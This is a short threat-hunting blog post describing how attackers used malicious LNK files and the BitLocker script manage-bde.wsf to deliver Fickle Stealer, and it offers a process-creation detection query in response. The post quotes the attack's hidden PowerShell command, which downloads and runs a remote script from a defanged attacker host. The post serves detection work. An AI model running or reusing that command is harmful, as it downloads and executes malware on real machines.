202. Adversaries Misuse a Script for Managing BitLocker to Deliver Fickle Stealer

Hello everyone!

Stealers again! This time we're going to talk about Fickle Stealer an an interesting delivery method leveraged by the threat actors.

So, the adversary used maclious LNK files to misuse a script for managing BitLocker (manage-bde.wsf) to download and execute a PowerShell script:

"C:\Windows\System32\manage-bde.wsf" & powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "

The script is executed via wscript.exe, so we can build our detection logic on suspicious command line parameters:

event_type: "processcreatewin"

AND

proc_file_path: "wscript.exe"

AND

cmdline: ("manage-bde" AND "powershell" AND "hidden")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge